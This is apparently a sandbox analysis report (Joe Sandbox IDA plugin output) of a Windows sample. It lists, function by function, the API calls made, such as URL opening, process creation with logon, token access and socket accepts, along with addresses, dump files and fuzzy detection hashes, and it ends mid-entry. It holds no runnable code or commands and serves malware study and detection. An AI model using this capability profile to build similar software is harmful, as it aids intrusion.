                          • API String ID: 2759813231-0
                          • Opcode ID: 0788becd65264d4fd2f067398c2b2dca41f0f5c01ef6bff8af4e87259c4d5e70
                          • Instruction ID: 28ec057ba54dd174bc5477734ae9459d5c37c64cb44298709e58fc5cbaf4a788
                          • Opcode Fuzzy Hash: 0788becd65264d4fd2f067398c2b2dca41f0f5c01ef6bff8af4e87259c4d5e70
                          • Instruction Fuzzy Hash: 85312F75D00108AFCB00EFB5DC859EFBBF9EF58314B5080AAE815E3211EA359E45CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B549B7
                            • Part of subcall function 00B54A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B54A60
                            • Part of subcall function 00B54A41: InternetCloseHandle.WININET(00000000), ref: 00B54AFD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Internet$CloseConnectHandleOpen
                          • String ID:
                          • API String ID: 1463438336-0
                          • Opcode ID: bea2e70335456397553ad9170aab89e501df90915ff2c9107bf449c5f740894e
                          • Instruction ID: 327f4756c909e69038efa81f97b0f082a12e2f0c674d0c1bbbb5511f287e2d32
                          • Opcode Fuzzy Hash: bea2e70335456397553ad9170aab89e501df90915ff2c9107bf449c5f740894e
                          • Instruction Fuzzy Hash: 7621D435244605BFEB129F60CC01FBBB7E9FB48706F10409AFE0597650EB719858A794
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B3BCD9
                          • OpenProcessToken.ADVAPI32(00000000), ref: 00B3BCE0
                          • CloseHandle.KERNEL32(00000004), ref: 00B3BCFA
                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B3BD29
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                          • String ID:
                          • API String ID: 2621361867-0
                          • Opcode ID: c59ebaa7526b1601da45d87f91888540b148b88a1737c68093e01a04bdd1b60b
                          • Instruction ID: f18b16e472ff398a1997140cc26f9ed4ba08656587fffc58c935f2826cd07357
                          • Opcode Fuzzy Hash: c59ebaa7526b1601da45d87f91888540b148b88a1737c68093e01a04bdd1b60b
                          • Instruction Fuzzy Hash: DE216D7210020DABDF119FA8ED49FEE7BE9EF04314F2440A5FA01A61A4CB76CD61DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00B5906D
                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00B5907F
                          • accept.WS2_32(00000000,00000000,00000000), ref: 00B5908C
                          • WSAGetLastError.WS2_32(00000000), ref: 00B590A3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorLastacceptselect
                          • String ID:
                          • API String ID: 385091864-0
                          • Opcode ID: b42b239265a4ee72530f78f955a960789127fc410138143907650f7517cec006
                          • Instruction ID: cc362a1a950b11b6af94d569e8758f2244564600e5071d4b11a92b975c2034f4
                          • Opcode Fuzzy Hash: b42b239265a4ee72530f78f955a960789127fc410138143907650f7517cec006
                          • Instruction Fuzzy Hash: E12154759001249FC710DF69D885A9ABBFCEF49710F0481AAF849D7291DB749E85CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 00B688A3
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B688BD
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B688CB
                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B688D9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Long$AttributesLayered
                          • String ID:
                          • API String ID: 2169480361-0
                          • Opcode ID: 665ea969680e13676c57e525c7fe051ffdb9681aa39756b13daed8323dbe863f
                          • Instruction ID: 6d08d592ce32b73877e138cb9a060702b81579aede30848cff1a931a6e2b8ccd
                          • Opcode Fuzzy Hash: 665ea969680e13676c57e525c7fe051ffdb9681aa39756b13daed8323dbe863f
                          • Instruction Fuzzy Hash: 33119031345114AFDB14AB28CC45FAA7BEAEF85320F184259F916C72E2CF74AD00CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B42CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00B418FD,?,?,?,00B426BC,00000000,000000EF,00000119,?,?), ref: 00B42CB9
                            • Part of subcall function 00B42CAA: lstrcpyW.KERNEL32(00000000,?), ref: 00B42CDF
                            • Part of subcall function 00B42CAA: lstrcmpiW.KERNEL32(00000000,?,00B418FD,?,?,?,00B426BC,00000000,000000EF,00000119,?,?), ref: 00B42D10
                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00B426BC,00000000,000000EF,00000119,?,?,00000000), ref: 00B41916
                          • lstrcpyW.KERNEL32(00000000,?), ref: 00B4193C
                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00B426BC,00000000,000000EF,00000119,?,?,00000000), ref: 00B41970
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: lstrcmpilstrcpylstrlen
                          • String ID: cdecl
                          • API String ID: 4031866154-3896280584
                          • Opcode ID: b3ef3161a7c9274f44566e08ad1f36b66a72973dcf68cfb34bb2bf86380b8558
                          • Instruction ID: ab20c75aab2510996e33f698d0d88045bf0ce5f4175aaa4c9b441fff950a98be
                          • Opcode Fuzzy Hash: b3ef3161a7c9274f44566e08ad1f36b66a72973dcf68cfb34bb2bf86380b8558
                          • Instruction Fuzzy Hash: D4110836110301AFDB15AF38DC59E7A77F8FF44350B80846AF806CB2A0EB719A51E7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _free.LIBCMT ref: 00B33D65
                            • Part of subcall function 00B245EC: __FF_MSGBANNER.LIBCMT ref: 00B24603
                            • Part of subcall function 00B245EC: __NMSG_WRITE.LIBCMT ref: 00B2460A
                            • Part of subcall function 00B245EC: RtlAllocateHeap.NTDLL(014A0000,00000000,00000001), ref: 00B2462F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AllocateHeap_free
                          • String ID:
                          • API String ID: 614378929-0
                          • Opcode ID: 6a06adf8d52cdae348b9da7c3a29e7e3cd3456bc7f0929d7ac7a370bb9f40e2a
                          • Instruction ID: 5cafbdfb7b0e7ea6dfebdade79c6348e0c35f6f5263f7742c9a8a6cee97e3a6e
                          • Opcode Fuzzy Hash: 6a06adf8d52cdae348b9da7c3a29e7e3cd3456bc7f0929d7ac7a370bb9f40e2a
                          • Instruction Fuzzy Hash: BA117332505622ABDB213F74BC457AB3BD8BF44760F6045B6F94D9E2A1DF788A40C690
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B4715C
                          • _memset.LIBCMT ref: 00B4717D
                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00B471CF
                          • CloseHandle.KERNEL32(00000000), ref: 00B471D8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle_memset
                          • String ID:
                          • API String ID: 1157408455-0
                          • Opcode ID: 458fe90dd0c676513d9201d2f8c1e890e7f9a6ab17ced332ab67efca1ca0a357
                          • Instruction ID: 54fb73da4ae4124b6ae3b338078b08d437d07fc605bb4bc05562e5e72a8dded6
                          • Opcode Fuzzy Hash: 458fe90dd0c676513d9201d2f8c1e890e7f9a6ab17ced332ab67efca1ca0a357
                          • Instruction Fuzzy Hash: EB11A7719412287AD720ABA5AC4DFABBBBCEF45760F10459AF504E71D0D7744F80CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00B413EE
                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00B41409
                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00B4141F
                          • FreeLibrary.KERNEL32(?), ref: 00B41474
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                          • String ID:
                          • API String ID: 3137044355-0
                          • Opcode ID: 1fe6cfe4ab820e521df7dd1051e587d678e25ee34e5cc755b37980c11ff2a347
                          • Instruction ID: 566389c0b59ec349dd640a32b9d86600e38891ad6d5697d7ce174576d07e0830
                          • Opcode Fuzzy Hash: 1fe6cfe4ab820e521df7dd1051e587d678e25ee34e5cc755b37980c11ff2a347
                          • Instruction Fuzzy Hash: BF217575900309ABDB209F59DC88ADABBF8EF00744F0088AA955297250DB74DB88EF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00B3C285
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B3C297
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B3C2AD
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B3C2C8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: ce7164435dac24d180f12b79ec137a378029009bd5294a96a8d36edbeab80db2
                          • Instruction ID: 364dc072e5e294aa9b661628378aad36d17560dfe859b3a7a2380093a19d4539
                          • Opcode Fuzzy Hash: ce7164435dac24d180f12b79ec137a378029009bd5294a96a8d36edbeab80db2
                          • Instruction Fuzzy Hash: A0112A7A940218FFDB11DFE8CC85E9EBBB4FB08710F204091EA04B7294D671AE10DB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00B47C6C
                          • MessageBoxW.USER32(?,?,?,?), ref: 00B47C9F
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B47CB5
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B47CBC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                          • String ID:
                          • API String ID: 2880819207-0
                          • Opcode ID: d9ad956f209b778ee37f4f0a365f9388e0f5de4a67b962700cdf95455dad3a4a
                          • Instruction ID: 9e15c44c167f33f960f9827d6f04e273921dda09d914a947b22fe4ae20362680
                          • Opcode Fuzzy Hash: d9ad956f209b778ee37f4f0a365f9388e0f5de4a67b962700cdf95455dad3a4a
                          • Instruction Fuzzy Hash: 7D11E572A04204ABD7119B68EC48E9A7BEDDF08724F144256F515D33A1DF708A04D7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B1C657
                          • GetStockObject.GDI32(00000011), ref: 00B1C66B
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B1C675
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CreateMessageObjectSendStockWindow
                          • String ID:
                          • API String ID: 3970641297-0
                          • Opcode ID: 3e4ce88d67ddd208dfffc86be9334728871bc455197d56c1d4c7beda8e7221bf
                          • Instruction ID: d255120f9bc542d55ac39a6e7243fc54963a8ce1e0e3e2eef6045acf8607c704
                          • Opcode Fuzzy Hash: 3e4ce88d67ddd208dfffc86be9334728871bc455197d56c1d4c7beda8e7221bf
                          • Instruction Fuzzy Hash: FB11AD72501649BFDF125FA09C84EEABFA9EF09364F554252FA0453160DB32DCA0DBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • QueryPerformanceCounter.KERNEL32(?), ref: 00B449EE
                          • Sleep.KERNEL32(00000000), ref: 00B44A13
                          • QueryPerformanceCounter.KERNEL32(?), ref: 00B44A1D
                          • Sleep.KERNEL32(?), ref: 00B44A50
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CounterPerformanceQuerySleep
                          • String ID:
                          • API String ID: 2875609808-0
                          • Opcode ID: 20f2d91f3da9134439cfdf535ebf67fcb4e4a0d248cdfe0a26fef57c5cc10c52
                          • Instruction ID: 7e208c217718dec699c16c1755b46ea870baef607203f1c1766411b6b87f494b
                          • Opcode Fuzzy Hash: 20f2d91f3da9134439cfdf535ebf67fcb4e4a0d248cdfe0a26fef57c5cc10c52
                          • Instruction Fuzzy Hash: 00112A31D4052CDBCF00AFE5DA89BEEBBB4FF09751F014096E941B2190CB309660DB99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                          • Instruction ID: 788d4b239cf21b7795b48b650127074a1328f42b3f5bfa1009b5d13e97ed6491
                          • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                          • Instruction Fuzzy Hash: AB01403200064EBBCF225F88DC41CEE7FA2FB18354F688495FE1859031D636C9B1AB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B2869D: __getptd_noexit.LIBCMT ref: 00B2869E
                          • __lock.LIBCMT ref: 00B2811F
                          • InterlockedDecrement.KERNEL32(?), ref: 00B2813C
                          • _free.LIBCMT ref: 00B2814F
                          • InterlockedIncrement.KERNEL32(014B3170), ref: 00B28167
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                          • String ID:
                          • API String ID: 2704283638-0
                          • Opcode ID: f5b099acfc5b354dd6ef4deddd8cd2b41031dfa345ccf6ffd9d11ae430bc2fe0
                          • Instruction ID: 16fc942757562a5b3a539cc7cfa4755c51df96ab91eef499d7110d475a390b15
                          • Opcode Fuzzy Hash: f5b099acfc5b354dd6ef4deddd8cd2b41031dfa345ccf6ffd9d11ae430bc2fe0
                          • Instruction Fuzzy Hash: C0016D31D02631ABCB16AB65B8467A977E0FF08712F040599F818772E1CF786852CBD6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00B6DE07
                          • ScreenToClient.USER32(?,?), ref: 00B6DE1F
                          • ScreenToClient.USER32(?,?), ref: 00B6DE43
                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 00B6DE5E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ClientRectScreen$InvalidateWindow
                          • String ID:
                          • API String ID: 357397906-0
                          • Opcode ID: c048b6374da5b7cc7331ff81241c6ad9260bf7e199eed226205cf783efdf9e03
                          • Instruction ID: 109a5714ef27fac492729d9309b7039437b3def86105f5199d605af5a434a116
                          • Opcode Fuzzy Hash: c048b6374da5b7cc7331ff81241c6ad9260bf7e199eed226205cf783efdf9e03
                          • Instruction Fuzzy Hash: 2A11EFB9D0020DEFDB41DF99D8849EEBBF9FB08210F108166E915E3264E735AA55CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __lock.LIBCMT ref: 00B28768
                            • Part of subcall function 00B28984: __mtinitlocknum.LIBCMT ref: 00B28996
                            • Part of subcall function 00B28984: RtlEnterCriticalSection.NTDLL(00B20127), ref: 00B289AF
                          • InterlockedIncrement.KERNEL32(DC840F00), ref: 00B28775
                          • __lock.LIBCMT ref: 00B28789
                          • ___addlocaleref.LIBCMT ref: 00B287A7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
